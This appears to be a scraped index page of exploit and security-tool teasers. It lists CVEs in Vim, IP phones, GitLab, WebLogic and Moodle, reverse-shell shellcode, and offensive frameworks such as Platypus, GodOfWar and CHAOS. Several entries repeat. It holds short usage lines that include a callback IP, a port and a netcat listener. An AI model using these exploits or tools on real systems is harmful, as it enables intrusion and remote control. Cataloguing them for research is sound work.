Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution

by Arminius @rawsec Vim/Neovim Arbitrary Code Execution via Modelines ================================================= Product: Vim 8.1.1365, Neovim 0.3.6 Type: Arbitrary Code Execution CVE: CVE-2019-12735 Date: 2019-06-04 Author: Arminius @rawsec Summary ------- Vim before 8.1.1365 and Neovim...

CVE-2018-19977

A command injection missing input validation, escaping in the ftp upgrade configuration interface on the Auerswald COMfort 1200 IP phone 3.4.4.1-10589 allows an authenticated remote attacker simple user -- in the same network as the device -- to trigger OS commands like starting telnetd or openin...

CVE-2018-16217

The network diagnostic function ping in the Yeahlink Ultra-elegant IP Phone SIP-T41P firmware 66.83.0.35 allows a remote authenticated attacker to trigger OS commands or open a reverse shell via command injection...

Command injection

The network diagnostic function ping in the Yeahlink Ultra-elegant IP Phone SIP-T41P firmware 66.83.0.35 allows a remote authenticated attacker to trigger OS commands or open a reverse shell via command injection...

CVE-2018-16217

The network diagnostic function ping in the Yeahlink Ultra-elegant IP Phone SIP-T41P firmware 66.83.0.35 allows a remote authenticated attacker to trigger OS commands or open a reverse shell via command injection...

GitLab: Privilege escalation due to insecure use of logrotate

Summary Gitlab sets the ownership of the logdirectory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate. Steps to reproduce Please note that the exploit is just a proof-of-concept. In order to win the race reliably the following...

Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server

PoC exploit for CVE-2017-10271, an RCE vulnerability in Oracle WebLogic. The exploit targets the async/AsyncResponseService endpoint and uses a SOAP request to inject malicious code. The payload is a Java XMLDecoder that creates a ProcessBuilder to execute a bash shell with a reverse shell payloa...

Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper

Exploit Title: Linux/x86 - Reverse Shell Shellcode 91 Bytes + Python Wrapper Exploit Author: Dave Sully Vendor Homepage: Software Link: NA Version: NA Tested on: Ubuntu 16.04 CVE : NA This is the raw assembly ; Filename: reverseshell.nasm ; Author: Dave Sully ; Website: http://suls.co.uk ; Purpos...

Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go

A modern multiple reverse shell sessions/clients manager via terminal written in go. Features Multiple service listening port Multiple client connections RESTful API Reverse shell as a service Screenshot Network Topology Attack IP: 192.168.1.2 Reverse Shell Service: 0.0.0.0:8080 RESTful Service:...

Windows Zero-Day Emerges in Active Exploits

A just-patched vulnerability in the Windows operating system that was previously unknown up until last week is being actively exploited in the wild; it opens the door for full system takeover. Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw...

GodOfWar - Malicious Java WAR Builder With Built-In Payloads

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby. Features Preexisting payloads. try -l/--list cmdget filebrowser bindshell reverseshell reverseshellui Configurable backdoor. try --host/-port Control over payload name. To avoid malicious...

CVE-2019-10478

An issue was discovered on Glory RBW-100 devices with firmware ISP-K05-02 7.0.0. An unrestricted file upload vulnerability in the Front Circle Controller glytoolcgi/settingfileupload.cgi allows attackers to upload supplied data. This can be used to place attacker controlled code on the filesystem...

CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems

CHAOS is a PoC that allow generate payloads and control remote operating systems. Features Feature | Windows | Mac | Linux ---|---|---|--- Reverse Shell | X | X | X Download File | X | X | X Upload File | X | X | X Screenshot | X | X | X Keylogger | X | | Persistence | X | | Open URL | X | X | X...

From 0 to ReverseShell: router vulnerabilities range the Dvar practice-vulnerability warning-the black bar safety net

The Dvar is a simulation of the arm architecture of the router vulnerability the shooting range, this article will introduce how to get a reverse shell, the intermediate will contain the environment to build, bugs to locate and use, as well as this practical experience. 1. Knowledge base This...

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

Moodle 3.4.1 - Remote Code Execution

Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload !/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org...

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

Moodle 3.4.1 Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...